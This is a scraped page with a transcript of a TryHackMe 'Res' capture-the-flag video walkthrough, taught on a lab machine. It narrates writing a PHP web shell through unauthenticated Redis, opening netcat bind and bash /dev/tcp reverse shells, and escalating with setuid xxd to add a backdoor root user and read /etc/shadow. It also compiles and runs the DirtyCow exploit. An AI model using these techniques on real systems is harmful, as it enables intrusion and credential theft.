Exploiting Unauthenticated Redis - TryHackMe!

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hello everyone my name is john hammond welcome back another youtube video and in this video i want to be showcasing the res room from tryhackme uh it's all about redus or redis i don't know how to pronounce that i don't know how to pronounce anything it says hack into a vulnerable database server with an in-memory data structure and the semi-guided challenge this is rated an easy room and i suppose it has some i guess i don't know fundamental stuff to it especially for the priv-esque but i think it is very cool and fun to showcase redus as something that you could abuse and take advantage of so i've deployed the machine already i have this ip address and i'll copy it if you haven't already deployed the machine you can hit that green button deploy here and then we can start to take a look at the box so i have already filled out all these questions and answers here um i will showcase how we get into each of those but let's dive in so i've got a terminal open here i will ping that box so i can confirm that i can reach it and i can let's make a directory youtube res to work in uh you could start some notes you could make little sublime text i don't know or whatever text editor of choice you've got to work with and make a little readme for yourself but i'm going to start with an nmap scan i'm going to use nmap tac sc attack sv tac o n nmap initial with this ip address so uh save scripts or default scripts and then enumerate versions output to the nmap format in that nmap directory that i just created and i'll save the file as initial and i'm copying and pasting that ip address in there so i could turn on verbose mode hit the v button realistically i probably should have included that tac v argument so it's already verbose by default but we'll see how long this takes and i guess we can start poking around on the box manually while we're waiting so i will access it on a web browser over here i'll just see if i can reach it it looks like there is an http port open or http listening on port 80 right okay we're rolling through and we found port 80 great but that has not found anything else seemingly we've only found that port so just to be sure because our default nmap scan will look for only the first common 1000 ports we should also run a tacp tac and that will include all ports we'll just call that that we probably don't need to do those other enumeration scripts but i guess maybe that's good to do this again i probably should have included that uh tac v flag but regardless looks like we're scanning with nmap just fine so we know we have port 80 we could start to like do some enumeration on that we could neato it we could go buster we could durbuster we could start to try and look at more that might be on that page i don't have oh nikto i have a typo there sorry now let's see if that will run and i should t that out to log it so let me t neekto.log there we go just some basic fundamentals see if that finds anything interesting and while we're doing that we could run go buster as well i do have go buster good so go buster der attack u for the url tech w for the word list do i actually have a word list in here i don't think so what is it in cali user share word lists word lists there is one there okay and let's get durbuster's word list and they have a directory list 2.3 medium i suppose so we could fire that up and see if that gets anything uh still waiting for this nmap scan to return it'll probably take a little bit i could be showcasing rust scan uh and that would likely find it super duper fast admittedly i am working within cali on wsl right now so running rust scan using that docker container with the kind of windows docker for desktop thing pasting in the ip address and using it with ruscan it tends to just kind of die i'm not exactly sure why i'm sure i could be passing in other arguments and maybe that'll kind of work better with it if i increase the batch size but it just doesn't happen so i don't know maybe one of you has a solution better than i do but it doesn't look like there's anything that nico's finding doesn't look like there's anything that go buster is finding and nmap is taking its sweet time ruskan just gave up which is fantastic to see all right uh we could do some research on reedus while we're waiting if my internet comes to hang out okay great read this redus is an open source or bsd licensed in-memory data structure store used at a database cache and message broker okay so i actually end up using redus when i'm setting up ctfd instances when i'm hosting capture the flag events we create a redis server and make sure that okay all of the user sessions are able to be uh actually stored and maintained and accessed so redus is the server that we end up creating for that typically we'll end up having an authorization setup or we'll create a password for that reader server to work on and that might not be the case when we're looking at it in a i don't know hacking lab or hacking environment so if we wanted to go find out the port that it's listening on it says by default the rita server is configured to run on the default port of 6379 you can connect to the server locally using remote or remotely using the redis cli command line tool and then you'll need to specify a password okay it looks like there are some documentations that showcase that so we could explore that if we'd like to let me shut down nikto and durbuster and then start to kind of tinker uh i will try and use that redus cli command and i need to supply what i actually want to connect to if you don't have rita cli installed you might need to go ahead and actually sudo apt install redis hyphen tools is the package name that includes that and maybe your shell actually suggested that to you i'm not exactly positive but you'll just go ahead and type in your password install it and then you are good to go so let me read this cli and then you'll specify tac h for the host that you want to connect to and i'll grab that ip address one more time so i can connect to it there we go submit there and now seemingly we are connected we are on that host and i don't know if we actually have needed to authenticate or not uh something that you could do to test is just try and run like ping and if it responds with pong then okay you are in fact connected to the server totally just fine and we could look up some redus enumeration techniques or like hacking read us or exporting reduce and see what we've got here hatrix puts out a great uh resource on this sort of thing so let me zoom in on that so you can see it basic information we've got the exact same kind of blurb that we saw online when we were simply googling and we've got that default port we could do automatic enumeration with some nmap scripts so that would probably be good to do especially since we can confirm and now that we know that we actually have a redis server here our own nmap scan is probably taking a serious amount of time because it's doing all ports you could use a banner grab so you could simply netcat to it to try and get any actual information or we could just connect as we've done with ria cli and the installation is just as i discussed first command you could try to use is info it may return output with information of the redis instance or something like the following is returned so if you see this no auth authentication required that means that you will need credentials to be able to access the reader server in the instance here let's try and just go ahead and run that info command and see what we get and we certainly do not have the whine and complain that we need authorization or authentication so there's some valuable and juicy info we have the redis server version 6.0.7 so we could copy and paste that and that i know is one of the answers that we need here scan the machine how many ports are open we saw 80 and we also know that redus is open on 6379 so 2 is the proper answer there redus is the database management system that's installed as we have discovered what port is the database managed system running on 6379 again as we've discovered what's the version of the management system installed on the server 6.07 and that is what we just determined running that info command so that's all that we really needed to run there to track down that information and then we need to just compromise the machine okay so let's kind of keep exploring and reading through this pen testing readiness documentation there are notes here or at least this these hack tricks right not particularly documentation by default readers can be accessed without credentials however it can be configured to support only a password or username and password we could specify this in read a stock configuration file and maybe at some point we could kind of configure and tinker with that play with it but in this case we don't have to we will not need to auth or authenticate if you have valid credentials you'll get this positive okay response after you've logged in or once you have access you could do more enumeration and just kind of look for stuff you can start enumerating the service of the following commands info which we've already ran client lists which we could explore redis response with connected clients so let's do client list and looks like that's my ip address locally and that's the only thing that's currently connected to it and we could get everything out of the configurations database or config so let's do config get literally everything and now there's a lot of stuff so this returns and outputs in kind of an interesting and peculiar way where there will be a variable name on one line and then the value following it so rdb checksum is set to yes daemonize is set to no etc it's not going to give you like a variable equals value syntax or like a colon to denote it really readably you'll just have to kind of take that information with one line following to get the actual value a lot of information here maybe something that could be particularly interesting for us especially some stuff that we will get into next we can discuss but this article again explains more rita's commands that we could work with and we also discuss dumping the database inside read us the databases or numbers excuse me are numbers starting from zero you can find if anyone is using the output of the command info inside the key space chunk okay that's particularly interesting but i'm more concerned with getting remote code execution to compromise the machine okay looks like we could potentially get a web shell but you have to know the path of the website folder well we do have this apache ubuntu default and i wonder if that will tell us by default ubuntu does not allow access through the web browser to any file a part of those located in var dub dub dub public html entries okay the default ubuntu document route is var www.html and that's kind of common that's pretty much what we would expect but we could see that typically with this ubuntu default page that's pretty handy so what we could do is we could connect to our victim reader server we could set the directory by modifying config and then setting a file name for it to be stored as if we give it a php extension then we could just okay just set a value seemingly and then go ahead and save and it might dump that file so we could try that let's go ahead and do some config set der var dub dub dub html right okay so that responded positively and then we could config set db file name um test.php maybe right and now let's just set a variable name so test and it doesn't matter because it'll be included in the this dump when we save everything it's kind of in reduces memory right we could set this to i don't know why my voice went weird there let's check out phpinfo and see if we can actually get php code execution for one thing now we've set that variable and we can save it good so let's hop back over to the web page here and try and access test.php ooh okay now we have phpinfo and we have proof that we can execute php which means that we have server side code execution so let's make this a little bit more fun let's set our database file name to something like shell.php and let's set test to something like a system with a variable that we could pass in like a dollar sign get c or something dollar sign underscore get will let us specify an http variable that we've supplied and c will just be the variable name that we want to use so now when i run this and i save that we should be able to have shell.php run anything that we'd like if we pass it in okay so right now i haven't supplied any command i haven't supplied a c value but if i do with a little question mark in c equals id ooh we have www data and a uid and gid output so it looks like we are running commands right we could run like who am i and dir and list or ls and other things so we have code execution now we just kind of want to get a reverse shell back to us so what could we do here we could use a typical like pen test monkey reverse shell cheat sheet and use like a net cat connection to get back to us something that we also could do is actually open up a bind shell depending on what version of netcat we have and actually let's let's verify we actually have netcat with a which and c okay we do have slash bin slash nc seemingly so could i try and run like nc tac v for the version is that a thing tac-tac version no seemingly okay let's try to see if it has that old tac-e argument or that tacky flag and parameter where we could specify a command to run as you connect back to it so tak e bin bash and then let's listen so ln vp l for listen n for don't resolve domain names dns stuff v for verbose and p for a port let's put it on like quad 8 or whatever now because i see the url on the web page still spinning i kind of have the thought that it's actively running that so i could go ahead and connect to it or at least try to right so let me move out of this terminal and let's netcat to that ip address that's 10 10 31 148 i think and it's quad eight right so i'm seemingly connected and i have command execution right so i can run things and navigate around the file system awesome okay good win good we we got it uh that's one way of doing it or you could of course do a simple bash shell uh interesting thing let me let me have that reverse shell the bash reverse shell i'll set up a listener on my attacker machine on quad 9 and let me try to use that bash reverse shell so i finally remembered this i finally memorized it and i want you to try and remember it too bash tac i for interactive redirected to an ampersand right and then dev tcp your ip address so i'm 10 2 2 132 and then slash and the port so quad 9 is what i'm listening on and then we go start from zero right and you redirect it to ampersand one zero and one that's kind of how i've started to remember it so now you don't have to look up hey what's that bash syntax for reverse shell all the time when you run this you may or may not actually get a shell back the gimmick here is that if it's running in sh or just that regular default flat shell it's not going to work it's going to get some bad file descriptor so that doesn't execute what you could do is you could pass it to another bash command so if in this url i included a bash tax c and then included like some quotes to denote this here now i've got bash running and that might not have ran for me let me use single quotes here see if that will behave or i might just have my syntax wrong maybe i maybe i lied the entire time let's get the high on coffee reverse shell cheat sheet and verify i could have could very well be wrong while i'm trying to tell you oh this is how you remember this thing and i just misremember myself bash tak i redirected to an ampersand dev tcp attacking ip address zero redirected to and one so that's totally right maybe we need slash bin bash or i need a space following these for some reason i know bash can be super duper finicky let me verify that my ip address is what i think it is so i will ipas ton zero and i am 10 2 2 132 listening on quad 9. let's see if that works still nothing maybe it's my wsl thing being annoying i shouldn't waste my time troubleshooting this when we already have given ourselves code execution previously doesn't need to be an issue maybe if anything you memorize the fact that okay bin bash tak i with that is uh the way you you get that what am i missing here this is blowing my mind that's the right syntax 10 to 2 132 quad 9 nothing nothing okay whatever we'll we'll edit that part out we'll we'll get it in post we'll do that netcat e methodology for bin bash and then let's listen on quad 8 and now that that is running we know we could connect back to it and get code execution fun thing here is that we could very well connect with pwncat so let me start that one more time and i'm going to hop on over to a different shell in get move into pwncat and i will get pull to get the current release so because caleb's doing some crazy work on this right now when we could showcase some of that let's invoke our virtual environment and then run pwncat and connect to that 1010 13 148 is that right 31. i was so close there we go on quad 8. so now we should be connecting to it great not in the database so it'll go ahead and connect to it and that works just fine for us so pwncat will be able to kind of showcase a lot of our enumeration stuff in a very quick and easy way uh it might take some time so we might fire up another session while we're working here but i'm going to switch to my local prompt i'm going to use the new syntax to try and run enumerate and if i tab complete on enumerate you could enumerate.gather and just start to look for stuff so pwncat will do its thing he's essentially running his own version of lin p's but uh let's go open into another terminal and try and connect back to it i should have started like a reverse shell while i was doing that but let's listen on quad 9 and then just do a regular connection here there we go or i could very well just do that with another pwncat instance and see if he survives so we can clear those old terminals that we don't need anymore what's up phone cat dewey's thing he might take a little bit because try hack me seems to be slow when i use this on a hack the box uh it's it's much much faster try hack me i think is a little bit i don't know um interesting thing though because i'm comparing and discussing hack the box in relation to try hack me right now you might have seen this gimmick with a redis technique here on the postman machine and you could use it to okay clobber one of the users private keys like their ssh private key so you could ssh in the box and that would give you initial access and that was great and i thought like oh res is going to be just like that i could clobber an ssh key but we don't have ssh open on this machine so that kind of gets in the way whatever interesting we've got now this web shell kind of a cool new different technique we could use so let's do some manual enumeration we know we are currently running as dub dub dub data so let's go ahead and cat out etc password oh but pwncat has finished so let's see what he's got for me blah blah blah scrolling through looks like we have results here so we have a mount point we have some network information we are running ubuntu 1604 aslr is enabled potentially found some passwords although these are just dollar sign twos so that doesn't make a whole lot of sense processes that are running a kernel version and set uid binaries ooh xxd is owned by root that's peculiar xxd is like a blaring and blatant gtfo bin oh is it also vulnerable to dirty cow that'd be fun we should try and use dirty cow maybe a little fun extracurricular at the end of this video um let's try to showcase that gtfo been gimmick so gtfo bins if you're searching for these xxd is a quick and easy win uh in this case we actually because it's owned by root we could probably just get that you know let's search for xd and he can file right and file read so we could just clobber etc password and get another user so pwncat knows how to do this actually if you try and run escalate auto it'll just tell you what it could potentially do because it knows hey we could read and write with xxd as root we could just go ahead and execute that and then it will try to clobber etc password um we've been finagling this because i brought it up and it's like it seems to think that it failed when it actually succeeded uh and let me see if it shows you here i'm kind of hoping we could uh i didn't mean to zoom in on that while it was going but it'll give me like hey error module failed no escalation path found but if i check out etcetera password which we've clobbered let's get to our remote prompt we have successfully added a pwncat user with a backdoor password that has user id 0 and can just be root so i will s you to pwncat and just use the pwncap password at the back door and now we're root that's it okay done uh for some reason poncat doesn't think that it succeeded and we're still kind of troubleshooting that but literally running it again it'll be like oh i found your persistence because i already created it and then i'll just give you root so that's neat uh moving into root which you can do then you are cat the flag root.text and you win okay that's all you needed to do um if you had not done that if you had been able to go into the other user here which i think was vianka yeah bianca actually has um permissions to just run sudo everything so let me see you into vyanka because i can and let's try and pseudo attack l uh you could don't need her password do you need your password regardless let me let me let me not care about that because we've just jumped over user and got into root uh we could get into her home directory and then cat that flag cat user.txt yep and you would submit that just fine we could answer those last questions oh what is the local user account i follow yeah i'm sorry because you had xxd as your prives you could use xxd to read it set reshadow and then you could grab bianca's hash and then crack it that's kind of nice and easy but we could do that right let's let's try and use some of those gtfo bins manually just so you see actually what's happening file read with xxd if i were just dub dub dub data again we could xxd etc shadow and just simply read it out and then we have bianca's password so we could crack that with john the ripper so let's move over to our same directory where we were we were in youtube res let's subtle shadow.txt or something and just slap it in there and then we should be able to run john yep i think in that and then word list uh where is do we even need to specify wordless well john just figured out while john is cranking let's try to see oh yeah he just grabs his his own user sir john is there one for rocky oh yeah it just just rips it out i'm not used to being on cali i'll admit man user share uh rock you yeah okay it's there so then you could see you into bianca beautiful one and then you could pseudo attack l you spelled that right one i think i still spelt it wrong nope okay she can just literally run everything he or she bianca male or female i don't know you can pseudo everything so there's root immediately uh gimmicks and fun things here though before we start to dive into tardy cow because you guys like when i move into stuff that i haven't seen before there's an interesting gimmick with this file right in xxd um let's say you are trying to write into uh anything how about that that'll be the name of the file that we want to write to and xxd writes from only the beginning and that's it so let me show you this let me paste this in and it's going to ruin this prompt so let me sync and reset cool if i paste this it still ruins that prompt whatever how about that nope let's get a regular let's do this from home who cares let's uh set l file to anything and then let's try and write echo like nine nines like one two three four five one two three into l file so now i have this anything file but if i were to echo five fives one two three four five cat anything i've added five fives and then there's my new line and then there's those remaining nines uh this would probably be a better example with attack n so we don't have the new line you'll notice that it's not clobbering the original data that's just how it's going to end up doing it let me rm anything so we can clear it out and get a better visual add in fours and now let's add in just twos and it just starts in the beginning and writes everything that you specify that's good to note is that you if you don't fill up the whole rest of that file buffer it'll still linger in there especially when you use xd uh at least with that gtfo bin technique so good to know all right um we've got root we've showcased some xxd stuff and do we have gcc we do all right let's try a dirty cat let's try it dirty cow dot c here's one and [Music] that is the one that's i think just tampering a file i wanna i want fire fart dirty cow fire fart i think it's the yeah it's dirty dot c this one here it'll add a whole user for us and it explains how you can compile it nice and easily let's see if we can write this here um let's just go ahead and where am i currently in phone cat oh i'm in pwn cat that's annoying so let's move into there get punk cat and let's just subtle a dirty dot c slap all that in and now let's go ahead and upload that so let's upload dirty.c there we go and now in my temp directory i have dirty.c if i cut that out on the victim we have our dirty cow source code so let's gcc and the syntax they use here is p thread and lcrypt are the libraries we're also going to include so slap that in see if it will compile it should output to dirty that's completed now i have dirty which is a file and binary i could run so let's make sure that's executable i think the compiler will already do that let's try it and see if we don't break this box uh let's set our password successfully backed up to temp password dot back under the new password i'll type in anything and let's give it a little bit of time to see if it actually does complete the dirty cow exploit uh i know this is a little bit dangerous it might shake the box up but i want to showcase i want to tinker with it i want to see if it'll be anything fun i guess i'll pause the recording now and just let this do its thing but i hope you guys have learned some other good nuggets while we've been rolling through it thanks i'll see you soon okay i stepped out for a quick little bio break but it looked like it finished done check it set a password to see if the new user was created you could log in with the username firefart and the password anything which is the one that i typed in there i did not mean to copy that and try to type it okay uh is firefart in itself a password um seemingly no s u firefart does he exist no that's not a set of shadow is it shadow shadow no oh i need to be rude well yeah okay fine um i'm pretty sure dirty cow is probably not even applicable to 1604 let's check dirty cow ninja you can check out that page and see what he's got here oh no i don't want these proof of concepts i want to see the check if your system is vulnerable you could see the patch kernel versions yeah 1604 lts and that is the kernel version that we saw 404 right let's do a you name tacay yeah okay maybe 4.40 and then 189 so i'm i'm thinking that's past but that was fun that was a little good little exercise you guys were probably screaming at me like stop don't bother john it's not even vulnerable but hey you got to see the compile process and maybe that was a good little exercise okay that's enough of me talking this has been a long video but hey thank you guys so much for watching uh i hope you enjoyed i hope you're able to follow along and see all of the little gimmicks and techniques and tricks there but that's how i got those flags here and completed the res room so thanks for hanging out everybody i hope you enjoyed and i'll see you in the next video [Music] [Music] with you
Info
Channel: John Hammond
Views: 19,075
Rating: 4.9521675 out of 5
Keywords:
Id: LVlQmRM6DZ0
Channel Id: undefined
Length: 35min 8sec (2108 seconds)
Published: Tue Oct 20 2020
Related Videos
Exploiting Kibana - JavaScript Prototype Pollution
John Hammond
14K
GoogleCTF - Cross-Site Scripting "Pasteurize"
John Hammond
50K
Chat with a Cybersecurity Recruiter
John Hammond
18K
ShellShock & Kernel Exploits - TryHackMe! 0day
John Hammond
37K
HackTheBox - "Remote" - Umbraco & Windows
John Hammond
42K
Instagram & Twitter OSINT - DownUnderCTF
John Hammond
45K
Pwntools ROP Binary Exploitation - DownUnderCTF
John Hammond
33K
MALWARE ANALYSIS - VBScript Decoding & Deobfuscating
John Hammond
310K
Custom Wordlists & SQL Injection - GuidePoint Security CTF (Belle)
John Hammond
10K
But how does bitcoin actually work?
3Blue1Brown
9.2M
Exploiting Tomcat with LFI & Container Privesc - "Tabby" HackTheBox
John Hammond
32K
TryHackMe GAMING SERVER - LXD Privilege Escalation
John Hammond
114K
Nested JavaScript Obfuscation - GuidePoint Security CTF Challenge
John Hammond
10K
TryHackMe! Tartarus - Website Password Bruteforcing
John Hammond
51K
9 Passive Income Ideas - How I Make $27k per Week
Ali Abdaal
2.1M
TryHackMe! EternalBlue/MS17-010 in Metasploit
John Hammond
157K
TryHackMe! Basic Penetration Testing
John Hammond
1.2M
Creating a TryHackMe Room - Developing Peak Hill
John Hammond
20K
BEGINNER Capture The Flag - PicoCTF 2021 001 "Obedient Cat"
John Hammond
26K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.